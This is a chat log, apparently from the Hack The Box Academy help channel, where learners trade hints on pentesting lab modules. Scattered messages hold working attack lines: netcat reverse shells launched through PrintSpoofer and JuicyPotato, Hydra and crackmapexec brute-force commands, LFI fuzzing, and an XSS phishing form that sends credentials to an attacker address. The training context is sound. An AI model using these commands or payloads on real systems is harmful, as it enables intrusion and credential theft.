#modules
Can anyone help with a nudge on the Whitebox skills assessment? I think I may be in the right direction but not sure.
Whitebox is a tough one, which bit are you stuck on?
@pine dagger Whitebox is your game💪
I'm in the "getting started" module and the "privilege escalation" section. I have copied root's id_rsa but I get a connection refused error when I try to log in. I tried copying the id_rsa file and I got prompted for the user's password, which I don't have.
I wouldn't have passed it without your help ❤️
We worked together, bro!
Can someone help me? I'm stuck in tier 2 Archetype, I can't wget the nc64.exe.
start of skill 😭
try -i and pass it the filename. Also make sure it's got the correct permissions.
????
Need to look at the source code and look for what functions have a vulnerability in one of those functions. You're looking for ones that take inputs in particular (which should narrow it down). Once you've narrowed it down, take a look at what inputs they accept, and try and get them to take the correct input first. Then once you think you've got it, then start looking at how to inject.
I have done that but it still seems not to work: ssh root@IP -i id_rsa
can someone help me?
I tried copying the id_rsa file to my local machine but I was prompted for the password for the user2 account, which I don't have.
appreciate you 😃
Why am I being ignored?
Because no one has any clue what help you are looking for. You've not provided any context of module, chapter, and question where you are running into problems.
Is the id_rsa file for that username?
tier 2 archetype https://discord.com/channels/473760315293696010/1140959071634194504
You're asking about a box?
yes
nope, it's for the root user but user2 has read access so I copied it to user2, tried logging in from there but no success
Then try #boxes. This channel is for HTB Academy.
no access
Probably need to link your HTB account with your Discord account.
I was doing it the whole time, but there's no end to the pages and I can't find anything interesting in the sources
Read #welcome
I don't follow what you're doing. The key in the id_rsa file is linked to a particular user.
It wouldn't matter if you copied it to a different user; it can only be used to authenticate the original user.
Guys, I have a question.
I am in the module https://academy.hackthebox.com/module/34/section/1873
and I read this specific article
and my question is in this video
Security+ Training Course Index: https://professormesser.link/sy0601
Professor Messer’s Course Notes: https://professormesser.link/601cn
Professor Messer's Practice Exams: https://professormesser.link/601ytpe
Discount Exam Vouchers: https://professormesser.com/vouchers/
Professor Messer Recommended Study Materials: https://professormesser.li...
I don't understand much English, but are they trying to say that a device can be deauthenticated depending on the version of the wireless device?
hey anyone done with keeper machine ?
Wrong channel. You probably want #boxes
It says you don't have access?
I solved it, the answer is yes.
Depends on the version of the access point.
Hi, did anyone complete the AD Enumeration & Attacks module??
Yes 👋
can I dm? I'm finishing the last exam but there's an underlying issue which I cannot figure out, I mean with bloodhound there's something wrong
(I'm not asking for any solution to any question, it's a mechanical issue)
Yea welcome to Dm
I'm very new to the bloodhound tho
Well basically, all the users I get can connect in RDP to MS01. Now my problem is that if I didn't boldly attempt to connect, what the fuck is going to tell me that I have the right to do so?
Not even bloodhound showed that I could connect, and I'm not a local user, I'm using a domain user for connection
Is the lab broken??
On a prior occasion (exam part 1), my user was even admin on the ms01, yet no enumeration showed that!
Don't think so, maybe it's how you're filtering it? Path? / your starting point / end point
Discuss pm I still have it loaded I think
not even if I use starting point my user --> ms01 I get an edge
Is anyone here a professional pentester with experience on BloodHound????
Just signed up and started in htb academy, any advice? thank you
Take lots of notes
For example? Like cheatsheets or something?
Like literally write down notes on what you're learning
Alright, thanks
if you can't access that verify your account
thank you
Hi everyone. Could someone who’s done the CPTS Firewall and IDS/IPS Evasion Medium lab DM me please? I’m stuck and would like some directions
Nmap module yes?
Yes
Have you tried using Discord's search feature?
Many people have asked and have been given nudges
No, good point. I’ll try that
Thank you
It is really just that? I had to use the pwnbox instead of my own VM? I felt sooo bad for not being able to resolve this simple thing… thanks a lot @fathom pendant
Np
ATTACKING COMMON SERVICES - Attacking Common Services - Easy
inlanefreight.htb. not found: 3(NXDOMAIN) is what i get whenever i try to enumerate the domain. I've added the domain/ip to my /etc/hosts
What did I do wrong?
Still need to specify ip with it
Working on Windows Privilege Escalation Skills Assessment - Part I and can't figure out why I can't find the LDAP admin password. I got a reverse PS shell as iis and have tried many search commands but can not find it. I am using commands like this: Get-ChildItem -Recurse -Include *.txt,*.ini,*.cfg,*.config,*.xml | Select-String "password" | Select-Object -Property Path. Any hints?
Attacking Common Services - Easy. I have found a user, but I am struggling with getting their password. Used hydra to bruteforce smtp and ftp with no results. Saw rockyou.txt was given on here but that takes 2000hrs to finish. Any help would be appreciated
Increase threads
That's at 64 threads
Hey hacker fam, I got the answer to the question but I didn't do the task required of me to do so. I'd like some help if y'all can provide some assistance. Attached is the question.
This is the section I'm in.
With no un/pw, I used ncrack to find them. Also, I didn't use rockyou.
hey guys, I'm stuck in "Attacking Common Services" : "Attacking DNS"
I use "subbrute.py" but I'm getting an error message regarding the code: IndexError: list index out of range
I'm guessing it's not supposed to be like this...
I'm not sure what to do next....
I have the username, but still says the password is not in my wordlist for ftp and it won't even attempt smtp. What wordlist did you use?
for my run, this worked for me. 2020-200_most_used_passwords. Not sure why the ones from resources didn't.
I get timeouts quite a bit , so I may have just tried something else that didn't time out.
That wordlist had it. Thank you very much
Hi,
I have a dumb question: is nmap with -sC -sV --max-retries 1 considered safe (will it destroy anything?) running in a production environment? (:
On free account, we have 70 cubes (cmiiw), is there a way we could have more than this besides from subscription?
It shouldn't break anything
Guess No ....
Utilize the discord search feature: other people have asked the same question
Follow the instructions the module tells you, but you might need to do a little further digging than what they ask
Not much to assist with here
I read the whole module and do not get ANY of the questions. https://academy.hackthebox.com/module/58/section/517
Go do the SQL injection fundamentals module and come back to this. If it still doesn't make sense, go to ippsec.rocks, search sqlmap, and see the tool in action.
thanks I did do that module I guess I will look into those
I have been limiting myself mainly to HackTheBox Academy.
There are many people who have already completed this module with little to no problems, so the first step is actually identifying what it is you're actually not understanding, instead of saying "I don't get any of it"
- Is it the use case you don't understand?
- The command line parameters?
- How you would get past a WAF with it?
- What the tool is actually doing?
- What the prompts during the command actually mean?
That is some illegal writeup you got, and if you need help with a room this isn't the right place to ask.
also just google
Hey guys, I'm doing the DNS Footprinting module. Does anyone have a hint for me which wordlist to use, so enumeration doesn't take forever?
I am still working on Windows PrivEsc 1, I am having a difficult time. So far I found a reverse PowerShell I can get with user iis through a web interface exploit. I have a Metasploit session that picked up the session using exploit/multi/handler but I can't seem to get any of the potatoes to work to get me elevated privs on the box... I still have not found the ldapadmin password but thought maybe my search would work better if I was elevated... Does anyone see some error in my method or can help figure out why I am having trouble in Metasploit with the potato methods?
I have also tried to use the PrintSpoofer method manually (outside of Metasploit) with no success.
|| The module is testing your patience.||
IT'S RIGGED
Take the smallest list in Seclists. If you don't find anything, use the next larger list.
Module : Pivoting, Tunneling, and Port Forwarding
Meterpreter Tunneling & Port Forwarding
Hello all,
I try to use msf with socks_proxy but it gets stuck at: [*] Starting the SOCKS proxy server
If I Ctrl+Z it closes msf and I have to kill -9 the process because it's running in the background on port 9050.
I managed to finish the page without that, but I still want to understand why it did not work.
You're on the right track. When in doubt, I like going to an ippsec video or 0xdf writeup where they use the exploit/privesc I'm trying to use and see if they do things any differently.
It's a skills assessment, so I don't want to say anything more than that.
Sorry for the late reply, did you figure it out?
# copyright info keeps popping up in my ffuf output. How can I stop this?
Check the List
I think there's that kind of content in there.
Hello guys, quick question regarding module Attacking Passwords, section Pass The Hash. The last question is saying that you can't connect to DC01 from anywhere except MS01. Idk if I understood that correctly, but it appears that you literally cannot pivot from MS01 to attempt to connect to DC01. I tried chisel, ssf, rdp, nothing is working out.
Does anyone know if it can't be accessed from anywhere except MS01 at all or can I open a tunnel and pivot from there?
PS: I'm going over the module again so I already solved it, but if I remember correctly I RDP'd from MS01 to DC01.
It's ok, and no I didn't. I saw the source of the admin index, I saw that the log parameter is located in the logs file, tried to access access.log and error.log but it didn't work.
Did you try fuzzing for an LFI payload?
Yes I did, no hits, at the new parameter and at the $$$_admin dir.
Let's backtrack your progress a bit.
^^
You fuzzed the index.php for parameters right?
You found a parameter that was available, you tried reading the src code of the files.
yep
you found a new directory in the source code.
you went to that directory and got welcomed with an index.php
You tried fuzzing that file, you found a vulnerable parameter.
Then you tried fuzzing that parameter but got no hit?
exactly
Did you try system.log directly as input?
Yes, all logs provided by the page give the same main page.
@acoustic owl lol I feel dumb. Fixed it. Thanks for answering my question again.
weird tbh
What wordlist did you use for fuzzing?
And btw, since you got to this point, you only have 2 steps left to finish everything :)
You mean for fuzzing LFI? It's seclists/Fuzzing/LFI/LFI-Jhaddix.txt
Did you filter size and everything?
ffuf -w ~/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.48.48:34531/index.php?l$$=FUZZ' -fs 15829
tried both parameters
You removed the vuln. directory from the command?
You can pivot using MS01 as a jump box. Saying "you can't connect to DC01 from anywhere except MS01" is just to say you can't access DC01 from your attacking machine.
It's already provided in the source code, and I tried it anyway.
I tried everything but it doesn't seem to work out, followed guides word for word. Idk, I'll get back and try with it again.
When I try to use PrintSpoofer I'm getting this error: COM -> recv failed with error: 10038,
I tried multiple numbers after the -l flag and all gave the same error, is there anything I can do about it?
This is in Windows PrivEsc Part 1 and for reference I'm using this command:
||.\PrintSpoofer32.exe -c ".\nc.exe 10.10.14.10 9001 -e cmd"||
ffuf -w ~/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.49.11:41153/index.php?l$$=l$$s/FUZZ' -fs 15829
If PrintSpoofer doesn't work, try a different exploit for that user privilege, or play with the PrintSpoofer flags if there are more
Check your DMs.
Okay tbh I'm out of ideas here.
I tried running a reverse chisel server:
attackBox: ./chisel.exe server -p 8000 --reverse
MS01: .\chisel.exe client ip:8000 R:socks
My proxychains conf:
socks5 127.0.0.1 8000
Is anything wrong with this that I'm not catching?
I confused JuicyPotato with PrintSpoofer.
The error message I sent is from JuicyPotato.
This is the command I'm using for reference:
||.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c .\nc.exe 10.10.14.10 9001 -e cmd.exe" -t * ||
On PrintSpoofer I get this error: [-] Operation failed or timed out.
with this command:
||.\PrintSpoofer32.exe -c ".\nc.exe 10.10.14.10 9001 -e cmd"||
I'm trying to abuse SeImpersonatePrivilege.
Again, if they don’t work, fiddle with the flags
It’s a skills assessment, so I won’t give away the answer that easy
alright
subdomains-top1million-5000 and 20000 didn't work so far. Am I doing something wrong or do I just need to wait? I mean I get results, but just not the one I need.
I told you to take the smallest list 😉
5000 entries are too much
Can someone give me some help? I'm in the PASSWORD ATTACKS Credential Hunting in Linux module. I found the password for the user "kira" but I didn't find anything else, and I couldn't upload firefox_decrypt.py to the machine. Does anyone have any tips?
but we are talking about seclists right? I feel stupid 😄
Yes, Seclists
Not every list shows you in its name how many entries it has.
Look at the file size
I will give some other another try, thanks for now 🙂
anyone?
But "dnsenum --dnsserver 10.129.12.123 --enum -p 0 -s 0 -o subdomains_4.txt -f /usr/share/wordlists/seclists/SecLists-master/Discovery/DNS/[wordlist] inlanefreight.htb" is correct, right?
You want to bruteforce inlanefreight.htb?
If so, why?
Hi, I am in the same position in SOCKS5 Tunneling with Chisel.
Server and client are well connected, but I can't xfreerdp on 172.16.5.19.
I thought that's the way to find the FQDN for the IP ending with 203 🤨
There are DNS zones that voluntarily give out all data with a zone transfer.
Only if a zone does not allow zone transfers do you have to bruteforce them.
Anyone got C programming projects I could work on just for fun?
OK I see, I was on the wrong track then, thanks for the hint.
Plz
This isn't the place to ask, start a thread and ask in #1024429874246590575
If I unlock a 500 cubes module which shows +100 cubes on it, will I get 500+100=600 cubes upon completing that module? Or just 100 cubes?
Ok
You will only get 100 back. You will never get more than you pay
Oh okay. Thanks!
All modules give back an amount proportional to their tier
For instance tier0 are considered "free" bc they give back what you pay (10)
Understood. Thanks a lot for explaining in detail 🙌🏻
There's a help article that explains it if you wanna look it up
Can I have any help?
Yo, can anyone help out with NoSQL injection SA 2?
Are you using proxychains? That module is very much follow step-by-step.
Yes, I am using proxychains.
My command is: proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
and proxychains4.conf is set to: socks5 127.0.0.1 1080
Comment out the socks4 line that was set up previously
Is there a reason / methodology for like randomly choosing "AppReadiness" in WindowsPrivEsc
Like in an actual box, how would we randomly know what box to choose, just finding one with SYSTEM?
Yes, I did that.
What's the error?
anyone?
One sec
And you're following the section exactly?
Yes
I feel like there's a missing step
How are you trying to upload it?
It means you get to change service settings as you wish (iirc), so anything running as system is good
My notes (from a while ago) say finding a url dev.inlanefreight.com has something useful
I can't really read my notes but
Although probably best to pick a service that you’re okay with having crash if you mess it up
Understood, appreciate it ❤️
I think you're looking at the wrong thing or replied to the wrong person
Right person 🙂
Could be wrong notes
Wrong notes lol this is password attacks related
And what is the error you're getting if it's not working
Yes I did, I just did it again to be sure, not working...
Try python2.7
not found
When I am attempting to install theHarvester on the Parrot HTB VM I get the following error. Has anyone run into this and know a solution for a fix? I have googled it and tried a bunch of fixes that did not work.
I don't have access to a computer to verify for you
Switch to the pwnbox and upload that one, iirc firefox_decrypt had a recent update that requires a newer version of python that isn't installed in the lab env
@fathom pendant Do you have an idea of what I can do?
I restarted the server and my machine..
Sudo apt update and sudo apt upgrade
Also Parrot doesn't currently have a python3.11 repo.
sudo apt install -f
One more question if the previous guy is still here: for Windows priv esc, regardless of how, after getting a user account into local admins, I can only figure out how to access Administrator after signing out and reconnecting. gpupdate /force doesn't seem to trigger an administrator access update. Any ideas?
It's supposedly in the works
I just downloaded firefox_decrypt from GitHub like it says in the module.
Yes I know. Pwnbox has an older version, or should have an older version, that you can upload
Still the same error, I did everything from the beginning.
Try
locate firefox_decrypt.py
Can't you just go around that with updatedb? This should update locatedb for you.
This is more demonstrating an issue than it is with not finding the tool
Hello, I was just wondering what the difference is between a vhost and a subdomain?
I don't seem to grasp what a vhost really is and why it is different from a public DNS record.
`In many cases, many websites would actually have sub-domains that are not public and will not publish them in public DNS records, and hence if we visit them in a browser, we would fail to connect, as the public DNS would not know their IP. Once again, if we use the sub-domain fuzzing, we would only be able to identify public sub-domains but will not identify any sub-domains that are not public.
This is where we utilize VHosts Fuzzing on an IP we already have. We will run a scan and test for scans on the same IP, and then we will be able to identify both public and non-public sub-domains and VHosts.`
Do we need to be in the same network in order to vhost fuzz, or just need to know the original IP? Or does this not matter?
Doesn't matter, it's describing some of the limitations of a lab-based network.
Then what is the difference between a vhost and just a normal subdomain, and why do I need to change the command parameters?
in a lab vhost fuzzing and subdomain enumeration can achieve the same goal, but in the real world they can potentially find very different things
a vhost is a subdomain or a domain that sits on the same web server
whereas a subdomain doesn't necessarily have to be the same computer at all
vhosts are how shared hosting services work for example
where you can have hundreds of websites with no relation to each other all sitting on the same IP
ok so when I do the host header I'm saying to the server to stay on this same server and not switch
not necessarily
it depends on how the host is resolved
but the host header specifies which resource you want, and a web server that resolves for that host will internally redirect things appropriately
ohhhh
ok so like it's a bit like instead of redirecting through the public DNS, they use their own "DNS" server and redirect me?
# Ensure that Apache listens on port 80
Listen 80
<VirtualHost *:80>
DocumentRoot "/www/example1"
ServerName www.example1.com
# Other directives here
</VirtualHost>
<VirtualHost *:80>
DocumentRoot "/www/example2"
ServerName www.example2.org
# Other directives here
</VirtualHost>
like this vhost configuration is saying that for the www.example1.org host to serve the files located at /www/example1
whereas the www.example2.org host has its files served from /www/example2
this COULD both be example.org and just have different subdomains like www or sales or whatever
yep
but its different than DNS because DNS has already happened before it even hits this configuration
yep
Think of a city block full of offices. When you think of vhosts, think of all the offices on that block as being on the same vhost. They could be owned by the same company, or they might not be (hosting providers). When you think of subdomains, that office could be on the same block as the main office, or another block entirely.
alright makes sense, (from an attack perspective), its just a different way of requesting for a specific resource
I understand the whole vhost same host and subdomain different hosts
but like the tool itself holds different results as it's "asking" in a different way of finding 1.example.com and 2.example.com
if I understand correctly
VHosts may or may not have public DNS records, so in order to access your site, you may need to change host names and addresses on your localhost (typically located in /etc/hosts) or use the Host: header of a standard HTTP request.
When you look for vhost, you're looking for every office on that city block. When you look for subdomains, you're looking for the branch offices no matter which block it's on, but not getting the info of what's on those other blocks other than branch offices*.
ok i understand now thank you very much, i hope this enlightens more people
No problem!
Can someone help me,
What is the ObjectAceType of the first right that the forend user has over the GPO Management group?
I have found the right on bloodhound but its not accepting the answer?
then don't use bloodhound
Can someone give me a hint with this question "Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})" from IMAP enumeration? https://academy.hackthebox.com/module/112/section/1073
The powershell command is returning nothing
yes it does, wait. Takes awhile
if it's the one I'm remembering
will leave it for a bit then
What have you tried
I have logged in to the IMAP server with openssl. After that, I identified 4 inboxes. Two seem to have emails but I cannot retrieve them somehow.
I have tried 1 FETCH 1 ALL, but it returns the same error as yours: "1 BAD Error in IMAP command FETCH: Invalid messageset (0.001 + 0.000 secs)."
Ah
I just checked the question
Iirc the flag for this is something you'll see when you connect
Because you probably didn't select the inbox first
Then that flag isn't in inbox
0 Exists
Do the list command
But also this answer is in the banner
The email one is the last question
Tried the same command in all the inboxes
Found the flag in the banner thanks
This is the path for the last question
Also as I said 1 fetch 1 body[] will be more useful than 1 fetch 1 all
Ok, let me try.
Just need to select the right one
I guess the mail must be in Dev or Dev.Department?
`1 list "" *
- LIST (\Noselect \HasChildren) "." DEV
- LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
- LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
- LIST (\HasNoChildren) "." INBOX`
Well only two of them don't have the \Noselect flag
or take my route and try em all and see what happens
trying things and seeing what happens is OP
I mean you literally can only select 2 of the things listed
I think it is bugged? Status says it has 1 message but when selecting the inbox it says 0 exists
No you're just dumb, when you did "inbox" in your select, you switched back to the normal inbox [which is empty]
The command is technically 1 select [folder]
Oh
Inbox is just a folder, not a classification
I'm trying to work on one of the starting-point machines and I'm supposed to go to an ip address in my browser but it's not working
I'm connected via openvpn
you probably have to add it to /etc/hosts
does it look like this : "example.htb"
no it's just xx.xxx.xxx.xx
does it start with "10."
yes
Are you wanting something out of the network tab in the dev tools, or something from the CLI, or a screenshot of the browser?
Currently on the SQLMAP Module at "Attack Tuning", while I understand the Prefix / Suffix Flag, I do not understand how I should find the proper prefix / suffix to add? I thought the whole point of SQLMap was to find those for me?
screenshot of the browser so i can see what issue you get
Module : Pivoting, Tunneling, and Port Forwarding
Skills Assessment
hello all
I am stuck in the last question, I have no idea what to do.
Pivot from the initial target to the system that's the domain controller
Or can connect to it
How can I find the DC ?
Well once you're on the first target: ping sweep
Yes I did that, there are 2 IPs I can not connect to, x.x.5.15 and x.x.6.45, but I don't think that's the DC, am I wrong?
I tried to connect to them, but it didn't make it.
Well you might need creds
I have the creds of ||vfrank||, is that not enough?
Anyone completed the final labs of the Footprinting module? Stuck on the medium lab...
Hey, can anyone DM me to try and get Responder working? I am having a bit of a breakdown over it, I have been stuck for 6 hours 😦
it won't grab the hash
Hello
Module - Broken Authentication - Predictable Reset Tokens
I need some help with this module. My code "works" but I can't get the right token. I believe it's my time.
Could someone give me some assistance with this? Python is what I'm using to send the request.
Can someone help me out. How do I transfer files using xfreerdp? I feel really dumb lol
Just xfreerdp as usual and add drive
With my session open on my attack box, isn't there way to send files that way too?
You can make a Python server in the attacker command line
And in xfreerdp, open browser <tun0>:8000/urfile
TY
Can someone please give me a hint on how to view the contents of \DC01\david.txt {password attack module}
I've obtained his hash using mimikatz and logged into his account. But I can't read the contents due to permission issues.
Already finish this, but let me remember, what section ?
Pass the hash
Have you enabled restricted admin?
Hello everybody, like many of you I'm a newbie. Hope to learn faster from now on.
Alright, can someone walk me through how to transfer this LaZagne tool please? I have found all the answers except this question and it is driving me nuts.
Like I said, you can use xfreerdp /drive:C/,<your-attacker-dir>, or the browser.
I was able to get LaZagne on the remote host, just trying to figure out how to run it.
Hello everyone,
In Information Gathering - Web Edition->Active Subdomain Enumeration,
In the question 'Submit the number of all "A" records from all zones as the answer. ',
I found the answer but 'inlanefreight.htb' is not an "A" record?
Thx in advance
I got it!
can anyone help on a section from win priv esc?
Hey guys I am new to the server and new to ethical hacking. I can only use the command prompt to ping the ip of a server of a website and using grabify or a link to track url or use commands like netstat -an, or tracert the ip of the website server. How do I find the ip of someone?
Check the log files from the server.
Which section, what have you tried and what does not work?
Hi, it's from "Windows Built-In Groups". Dumped the NTDS and got the password for Admin, but running runas gives me wrong password?
Is this the question?
Leverage SeBackupPrivilege rights and obtain the flag located at c:\Users\Administrator\Desktop\SeBackupPrivilege\flag.txt
yes
and what exactly did you do?
Dumped the NTDS and got the password for Admin, but running runas gives me wrong password?
hashcat, etc.
Unless this is not the intended way and I should RDP?
Why?
The task is
„Leverage SeBackupPrivilege rights and obtain the flag“
Just copy using Copy-FileSeBackupPrivilege?
🤦🏼♂️
Read the Section again 😉
guess i went too deep
thanks 🙂
Module: Intro to Assembly Language
Question: Add an instruction at the end of the attached code to move the value in "rsp" to "rax". What is the hex value of "rax" at the end of program execution?
global _start
section .text
_start:
mov rax, 1024
mov rbx, 2048
xchg rax, rbx
push rbx
mov rax, [rsp]
Not sure what's wrong with my code.
It's moving the value in rax, you don't need the braces
[rsp] is getting the value located at the address specified by RSP
I have tried removing the brackets same thing
hm, not sure then, could be something with how you're supposed to write out x86, I haven't done the module yet
Yeah, I'm new to assembly so not sure what's going on.
Are you recompiling every time you make an edit?
I just realized the module is tier 3 so I don't have access to it, probably make sure you give the answer exactly how they do it in the example
could be the difference between 0x400 and 0x00000400
that'll do it
Hi, I'm stuck in Password Attacks lab hard, already got Johanna's passwd.
Tried xfreerdp and cred hunting, didn't get any creds, just saw user ||david||,
tried brute forcing that user on SMB | RDP, already one hour, didn't get the passwd.
Should I go back to cred hunting or continue brute forcing?
Already tried LaZagne from Linux but got a blank screen, tried the existing LaZagne on the Windows target, it force closed.
did you get the One piece, Shanks?
have you had a cyborg's right hand, Shanks?
Be sure to take a good look around for things once you gain some creds and can login to a user's account.
hi
Yes heey @twin portal
Please I need some tips on an active machine but it looks like this isn't the right place to ask my question and it seems I don't have permission to send messages
read #welcome and #rules after that use /verify at #bot-commands and ask that in #boxes
Hi, the Python script is not parsing the wordlist correctly, in the Broken Authentication module, Default Credentials part. Can someone check this?
+1
thanks
Hi guys, I'm stuck on the last 2 questions of AD Enumeration and Attacks Pt2. I'm currently on MS01 in a PowerShell session as CXXXX and I'm trying to figure out a way to go from here. I know this user has GenericAll enabled, so my thinking is to maybe make another user who can winrm to DC01? Would anyone mind giving me a nudge please?
I’m also having trouble getting PowerView to work on MS01, so I’m wondering if it’s my error or if it’s disabled on the box
Hi guys, I just finished "Attacking Common Services - Easy" || using MySQL & SELECT "<?php****
went to the URL, used the "find" command for the flag.txt & used "type" to get its content.||
But I was wondering, are there any other ways? If someone can please help to upgrade my arsenal...
Nvm I had a brainwave!
Hey guys, I could really use help on the DNS Footprinting module, been stuck here for 2 days now on the last question:
I tried to find the name with an AXFR zone transfer, I tried bruteforcing it with dnsenum and 7 different wordlists, I have no clue what I'm doing wrong.
Host .203?
First, you have to find all the zones in this task.
Blindly bruteforcing the server does not help.
Question 2 I ran Crackmap command ...crackmapexec smb 10.129.141.167 -u jason -p /home/kali/Downloads/Attacking_Common_Services/pws.list
but got nothing ... https://academy.hackthebox.com/module/116/section/1167
Try to find the argument that will allow you to do local auths
Somewhat like this right: dig axfr inlanefreight.htb @IP ?
but I didn't specify a domain
With this you will do a zone transfer.
Not all zones allow a zone transfer from everyone
Then you mean this: dig any inlanefreight.htb @10.129.14.128 ?
No, you are supposed to find all zones.
With this you ask the server to give you all data of the zone. Whether it does or not depends on its configuration.
I don't get how I do that, I'm sorry, maybe I'm just too dumb to understand it.
The zone inlanefreight.htb allows a zone transfer and thus gives you all data voluntarily.
But the host you are looking for is not there. This means that there must be at least one other zone.
Find another zone and query it. Does it contain the host you are looking for? If not, there must be another zone.
Remember, not every zone allows zonetransfer from everyone.
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/GetUserSPNs.py", line 51, in <module>
from impacket.ldap import ldap, ldapasn1
File "/usr/local/lib/python3.11/dist-packages/impacket/ldap/ldap.py", line 41, in <module>
import OpenSSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 3279, in <module>
_lib.OpenSSL_add_all_algorithms()
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'lib' has no attribute 'OpenSSL_add_all_algorithms'
If GetUserSPNs has a bug, you could try to fix it like this...
@acoustic owl Yes, I understood that so far, but I don't get how I find the other zones. That's the only issue I have atm. If I know how to find other zones, then I can query them and see if the host I'm looking for is in there. To me it's just not clear how I find the other zone(s).
If you have read the link above, you know that DNS is divided into zones.
This means that each subdomain can theoretically be a zone.
Hello, I am currently in the XSS Basics module in the Phishing section. While doing the exercise and following along, in the “Login For Injection” and “Cleaning Up” subsection, the following does not get rid of the URL entry form and I am unsure as to how to fix it to get rid of the URL form.
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
I was able to do the login form injection by modifying the method using '> to comment out the img tag and then just injecting the raw HTML instead of minifying it and commenting out the end with <!--. I feel like minifying it should make it easier, and would like to understand how to do it using that method. Already tried googling many things. Might need to just take a break to let it all sink in. Thanks for any guidance you can provide.
It's about DNS, not ffuf
sorry i wanted to reply to a message about ffuf but i put it here sorry again
Yeah, like blog.example.com and shop.example.com, right? So if I find all the subdomains of example.com and query all of them with dig axfr example.com @IP, I should find all hosts, right?
Only if each zone also allows a zone transfer. Otherwise not
any zone that does not allow zone transfer, you must query manually or with automated tools.
however in the script I shared there is an option to search for subdomains if you need it
using ffuf as can also be seen in the attacking web app with ffuf module
So I first have to run something like gobuster to find all subdomains, then query every single one of them to see if they allow zone transfers, and if I don't get the host I'm looking for, I have to bruteforce those ones?
No
Make a zone transfer of the domain inlanefreight.htb
You will get all subdomains in this zone.
Then consider which of these subdomains could be a zone and query them.
Be sure to read up on DNS so you understand exactly how it works.
But if a subdomain is in another zone would the zonetransfer of inlanefreight.htb still show it?
A successful zonetransfer reveals all data of this zone
So if you do a zone transfer to example.com and it is successful, you will get data like
ns.example.com
www.example.com
zone1.example.com
zone1 could be a zone of its own. You can query it right now.
If the zonetransfer is successful, you will get data like:
ns.zone1.example.com
www.zone1.example.com
Ok, I think I understand now. My first zone transfer of inlanefreight.htb gave me this. And now I do zone transfers of all subdomains to see which don't allow zone transfers, and those I have to brute force. I'm really sorry to take up so much of your time and effort.
here for example internal allows zone transfers, but doesn't have the host I'm looking for, so I try the others
If the zonetransfer is not successful, this zone may not allow zonetransfer from anyone.
Then you can still query this zone manually.
Like so
dig ns.zone1.example.com @nameserverip
This means that there must be other zones
Like dev. and app. or am i on the wrong track again?
Ok i really was overthinking it then. Thank you.
No access
hint from me, dont overcomplicate and really look into everything you find
what did you try so far and what did you find?
yeah, I found a service, version is 4.4.4
I also found a vulnerability but not able to find any exploit
Read and follow #welcome
Dont overcomplicate stuff, not everything needs an exploit
means I'm missing something important
This box rewarded me for just looking at a lot of things
okay, I'm searching, by the way I'm a script kiddie now, that's what I'm thinking
should i try directory bruteforcing
Have you found a site yet?
yeah
it's
»|« RT 4.4.4+dfsg-2ubuntu1 (Debian) Copyright 1996-2019 Best Practical Solutions, LLC
I found a login panel
Then look for what you can do with the login panel. Really don't overthink stuff
Sometimes you don't need tools or scripts, can't tell you more than that.
read #welcome and #rules after that use /verify at #bot-commands and ask that in #1139981418164920464
bro u own that machine
Im on 'login bruteforcing' and when I use cupp to generate a password list it says 'william.txt' is where the dictionary is saved, but when I search my filesystem for william.txt it says does not exist. Why is it doing this?
first, it's a box, not a THM machine; second, nope, and the box owner is on the box page
also don't DM the box's creator begging for hints, just ask your question in the appropriate channel
okay, but the point is that
what can I do with the login page
without using any tool, how can I bypass it
which section are you on? also after inputting all of the info does the tool say something like outputed: (file name) or something?
also pls stay on topic of this channel if not you will get the 👢 from one of the mod
You should ask in #1139981418164920464
If you have no access read and follow #welcome
This channel is for questions about modules from the Academy
read #welcome and #rules after that use /verify at #bot-commands and ask that in either #general or #1024429874246590575
Thank you, my apologies.
yes for both x)
Is there a yearly silver student plan for the Academy? that's comparable to $8/m for students.
I mean, that's based on $8/m for students
who own keeper flags
Yeah 🤣

One piece fan
a lot! are you
@autumn pilot if you are here could give this spamming clown the 👢 (* on all 4 academy channels)
can anyone help me with this? 🙂 https://forum.hackthebox.com/t/login-brute-forcing-child-with-pid-xxxx-terminating-cannot-connect/294985
Is there something I'm doing wrong here or is there some kind of connection error? When I'm trying to brute force the web form I'm getting a lot of errors: hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt -f 94.237.62.195 -s 41203 http-post-form "/login.php:username=^USER^&password=^PASS^:F=
i've deleted his messages there, if he really needs the hint for that machine, then he will need to verify and ask in the appropriate channel
Haha, gomu gomu no....
well, if you haven't skipped the onboarding when you joined, you would have an idea what to do
@autumn pilot there’s a message in #858470491676737536 too
section Password Attacks, module Protected Archives: I'm getting this error when I try to use zip2john.py: line 1 ELF SyntaxError: source code cannot contain null bytes .
a google search says this fixed it: sed -i 's/\x0//g' FILENAME
however, not working for me.
any idea what i can do to fix this error
and i can't put zip2john in an interpreter because its a binary to crack protected archives
#bot-commands as well, if no ones noticed
when I use python2 I get this error code
i've been trying that
try with just zip2john (without python2 or 3)
@vital adder Sry, had to run an errand. Back now. I'm on Login Brute Forcing - Service Authentication Brute Forcing. Here is the exact output:[+] `Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to william.txt, counting 44504 words.
Hyperspeed Print? (Y/n) : n
[+] Now load your pistolero with william.txt and shoot! Good luck!`
Whoever invented ICMP tunneling with SOCKS was a genius
it looks like a nmap scan but its SSH
(according to what I understood)
@acoustic owl I´m still stuck here.
